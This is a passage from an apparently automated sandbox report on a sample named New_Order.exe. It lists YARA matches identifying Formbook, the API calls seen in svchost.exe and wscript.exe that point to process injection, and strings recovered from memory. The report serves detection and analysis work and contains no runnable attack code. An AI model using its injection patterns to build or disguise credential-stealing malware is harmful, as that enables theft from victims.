          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmpString found in binary or memory: https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: New_Order.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181BA NtCreateFile,1_2_004181BA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004182EA NtClose,1_2_004182EA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041839B NtAllocateVirtualMemory,1_2_0041839B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03969A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk,1_2_03969A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A50 NtCreateFile,LdrInitializeThunk,1_2_03969A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039699A0 NtCreateSection,LdrInitializeThunk,1_2_039699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03969910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039698F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_039698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969840 NtDelayExecution,LdrInitializeThunk,1_2_03969840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,1_2_03969860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969780 NtMapViewOfSection,LdrInitializeThunk,1_2_03969780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039697A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_039697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969FE0 NtCreateMutant,LdrInitializeThunk,1_2_03969FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969710 NtQueryInformationToken,LdrInitializeThunk,1_2_03969710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_039696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03969660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039695D0 NtClose,LdrInitializeThunk,1_2_039695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969540 NtReadFile,LdrInitializeThunk,1_2_03969540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A3B0 NtGetContextThread,1_2_0396A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969B00 NtSetValueKey,1_2_03969B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A80 NtOpenDirectoryObject,1_2_03969A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969A10 NtQuerySection,1_2_03969A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039699D0 NtCreateProcessEx,1_2_039699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969950 NtQueueApcThread,1_2_03969950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039698A0 NtWriteVirtualMemory,1_2_039698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969820 NtEnumerateKey,1_2_03969820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396B040 NtSuspendThread,1_2_0396B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A710 NtOpenProcessToken,1_2_0396A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969730 NtQueryVirtualMemory,1_2_03969730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969770 NtSetInformationFile,1_2_03969770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A770 NtOpenThread,1_2_0396A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969760 NtOpenProcess,1_2_03969760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039696D0 NtCreateKey,1_2_039696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969610 NtEnumerateValueKey,1_2_03969610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969650 NtQueryValueKey,1_2_03969650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969670 NtQueryInformationProcess,1_2_03969670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039695F0 NtQueryInformationFile,1_2_039695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AD30 NtSetContextThread,1_2_0396AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969520 NtWaitForSingleObject,1_2_03969520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03969560 NtWriteFile,1_2_03969560
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9840 NtDelayExecution,LdrInitializeThunk,7_2_048A9840
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_048A9860
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A99A0 NtCreateSection,LdrInitializeThunk,7_2_048A99A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A95D0 NtClose,LdrInitializeThunk,7_2_048A95D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_048A9910
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9540 NtReadFile,LdrInitializeThunk,7_2_048A9540
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A96D0 NtCreateKey,LdrInitializeThunk,7_2_048A96D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_048A96E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9650 NtQueryValueKey,LdrInitializeThunk,7_2_048A9650
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A50 NtCreateFile,LdrInitializeThunk,7_2_048A9A50
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_048A9660
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9780 NtMapViewOfSection,LdrInitializeThunk,7_2_048A9780
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9FE0 NtCreateMutant,LdrInitializeThunk,7_2_048A9FE0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9710 NtQueryInformationToken,LdrInitializeThunk,7_2_048A9710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A98A0 NtWriteVirtualMemory,7_2_048A98A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A98F0 NtReadVirtualMemory,7_2_048A98F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9820 NtEnumerateKey,7_2_048A9820
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AB040 NtSuspendThread,7_2_048AB040
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A99D0 NtCreateProcessEx,7_2_048A99D0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A95F0 NtQueryInformationFile,7_2_048A95F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9520 NtWaitForSingleObject,7_2_048A9520
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AAD30 NtSetContextThread,7_2_048AAD30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9950 NtQueueApcThread,7_2_048A9950
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9560 NtWriteFile,7_2_048A9560
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A80 NtOpenDirectoryObject,7_2_048A9A80
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A00 NtProtectVirtualMemory,7_2_048A9A00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9610 NtEnumerateValueKey,7_2_048A9610
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A10 NtQuerySection,7_2_048A9A10
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9A20 NtResumeThread,7_2_048A9A20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9670 NtQueryInformationProcess,7_2_048A9670
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A97A0 NtUnmapViewOfSection,7_2_048A97A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AA3B0 NtGetContextThread,7_2_048AA3B0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9B00 NtSetValueKey,7_2_048A9B00
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AA710 NtOpenProcessToken,7_2_048AA710
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9730 NtQueryVirtualMemory,7_2_048A9730
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9760 NtOpenProcess,7_2_048A9760
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048A9770 NtSetInformationFile,7_2_048A9770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048AA770 NtOpenThread,7_2_048AA770
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006281C0 NtCreateFile,7_2_006281C0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00628270 NtReadFile,7_2_00628270
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006282F0 NtClose,7_2_006282F0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006283A0 NtAllocateVirtualMemory,7_2_006283A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006281BA NtCreateFile,7_2_006281BA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006282EA NtClose,7_2_006282EA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062839B NtAllocateVirtualMemory,7_2_0062839B
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_004069450_2_00406945
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040711C0_2_0040711C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041BA5D1_2_0041BA5D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041C34C1_2_0041C34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B4A31_2_0041B4A3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBB01_2_0395EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E03DA1_2_039E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDBD21_2_039EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F2B281_2_039F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AB401_2_0394AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F22AE1_2_039F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DFA2B1_2_039DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F9001_2_0392F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039441201_2_03944120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B0901_2_0393B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A01_2_039520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F20A81_2_039F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F28EC1_2_039F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E10021_2_039E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FE8241_2_039FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FDFCE1_2_039FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1FF11_2_039F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F2EF71_2_039F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ED6161_2_039ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03946E301_2_03946E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039525811_2_03952581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F25DD1_2_039F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393D5E01_2_0393D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F2D071_2_039F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03920D201_2_03920D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D551_2_039F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393841F1_2_0393841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ED4661_2_039ED466
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487B0907_2_0487B090
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048920A07_2_048920A0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049320A87_2_049320A8
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049210027_2_04921002
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487841F7_2_0487841F
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048925817_2_04892581
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0487D5E07_2_0487D5E0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0486F9007_2_0486F900
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04932D077_2_04932D07
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04860D207_2_04860D20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048841207_2_04884120
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04931D557_2_04931D55
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_049322AE7_2_049322AE
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04932EF77_2_04932EF7
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04886E307_2_04886E30
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0489EBB07_2_0489EBB0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04931FF17_2_04931FF1
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04932B287_2_04932B28
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062BA5D7_2_0062BA5D
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062C34C7_2_0062C34C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00618C607_2_00618C60
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B4A37_2_0062B4A3
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00612D907_2_00612D90
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00612FB07_2_00612FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B150 appears 48 times
          Source: C:\Windows\SysWOW64\wscript.exeCode function: String function: 0486B150 appears 35 times
          Source: New_Order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: New_Order.exe, 00000000.00000003.233299812.0000000002C3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
          Source: New_Order.exe, 00000000.00000002.240312486.0000000002480000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs New_Order.exe
          Source: New_Order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
